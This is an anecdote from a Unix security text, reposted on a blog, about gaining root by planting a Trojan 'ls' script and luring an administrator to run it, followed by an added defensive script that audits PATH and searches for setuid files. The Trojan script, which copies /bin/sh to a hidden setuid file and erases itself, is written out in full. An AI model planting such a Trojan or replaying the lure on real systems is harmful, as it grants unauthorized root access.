Stealing Superuser
Once upon a time, many years ago, one of us needed access to the root account on an academic machine. Although we had been authorized by management to have root access, the local system manager didn't want to disclose the password. He asserted that access to the root account
was dangerous (correct), that he had far more knowledge of Unix than we
did (unlikely), and that we didn't need the access (incorrect). After
several diplomatic and bureaucratic attempts to get access normally, we
took a slightly different approach, with management's wry approval.
We noticed that this user had "." at the beginning of his shell search
path. This meant that every time he typed a command name, the shell
would first search the current directory for the command of the same
name. When he did a su to root, this search path was inherited by the new shell. This was all we really needed.
First, we created an executable shell file named ls in the current directory:
CODE:
#!/bin/sh
# Trojan "ls": plant a hidden copy of the shell, make it setuid (root if
# the caller is root), erase this script, then run the real ls so the
# listing looks normal
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}
Then, we executed the following commands:
CODE:
% cd
% chmod 700 .
% touch ./-f
The trap was ready. We approached the recalcitrant administrator with the
complaint, "I have a funny file in my directory I can't seem to
delete." Because the directory was mode 700, he couldn't list the
directory to see the contents. So, he used su to become user root. Then he changed the directory to our home directory and issued the command ls to view the problem file. Instead of the system version of ls, he ran our version. This created a hidden setuid root copy of the shell, deleted the bogus ls command, and ran the real ls command. The administrator never knew what happened.
We listened politely as he explained (superciliously) that files
beginning with a dash character (-) needed to be deleted with a
pathname relative to the current directory (in our case, rm ./-f); of course, we knew that.
A few minutes later, he couldn't get the new root password.
This article is from the ChinaUnix blog; to view the original, visit: http://blog.chinaunix.net/u/19729/showart_118289.html
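The trick above needs two things: a search path that makes the shell look in the current directory (a "." entry, or an empty component, which means the same thing), and a setuid copy of a shell that nobody notices. The following is an added example, not code from the book or from the post, showing the defender's side: an audit of a PATH string that flags and strips such entries, and a search for stray setuid files under a directory. The function names (audit_path, sanitize_path, find_setuid_under) are my own. One caveat worth knowing when reading the story: bash drops a setuid effective UID at startup unless invoked with -p, so the planted shell copy works as described only with shells that do not do this.

```shell
#!/bin/sh
# Added example (not from the book or the post). Function names are mine.
#
# audit_path       - flag PATH entries that resolve against the current
#                    directory ("." or an empty component) or are relative
# sanitize_path    - the same PATH with those entries dropped
# find_setuid_under- list setuid regular files below a directory

# Print each unsafe entry of the PATH-style string $1, one per line.
# Returns 0 when every entry is absolute, 1 otherwise.
audit_path() {
    # A sentinel ':' lets the loop handle the last component too. Splitting
    # by hand instead of with IFS keeps empty components visible; word
    # splitting silently drops an empty component at the end of the string.
    _rest="$1:"
    _bad=0
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        case "$_entry" in
            "" | .) printf 'current directory: "%s"\n' "$_entry"; _bad=1 ;;
            /*)     ;;   # absolute path: fine
            *)      printf 'relative: "%s"\n' "$_entry"; _bad=1 ;;
        esac
    done
    return $_bad
}

# Print $1 with every non-absolute entry removed (duplicates are kept).
sanitize_path() {
    _rest="$1:"
    _out=""
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        case "$_entry" in
            /*) _out="${_out:+$_out:}$_entry" ;;
        esac
    done
    printf '%s\n' "$_out"
}

# List setuid regular files below directory $1, staying on one filesystem.
# A shell copied by root and chmod 4555'd, like .superdude, shows up here.
find_setuid_under() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Stand-alone usage: check the caller's own PATH.
if audit_path "$PATH"; then
    echo "PATH is clean"
else
    echo "suggested PATH: $(sanitize_path "$PATH")"
fi
```

Run find_setuid_under against each home directory (as root, with -xdev so a user cannot redirect it onto another filesystem) to catch the hidden shell copy; the PATH audit belongs in root's profile and in any script that wraps su.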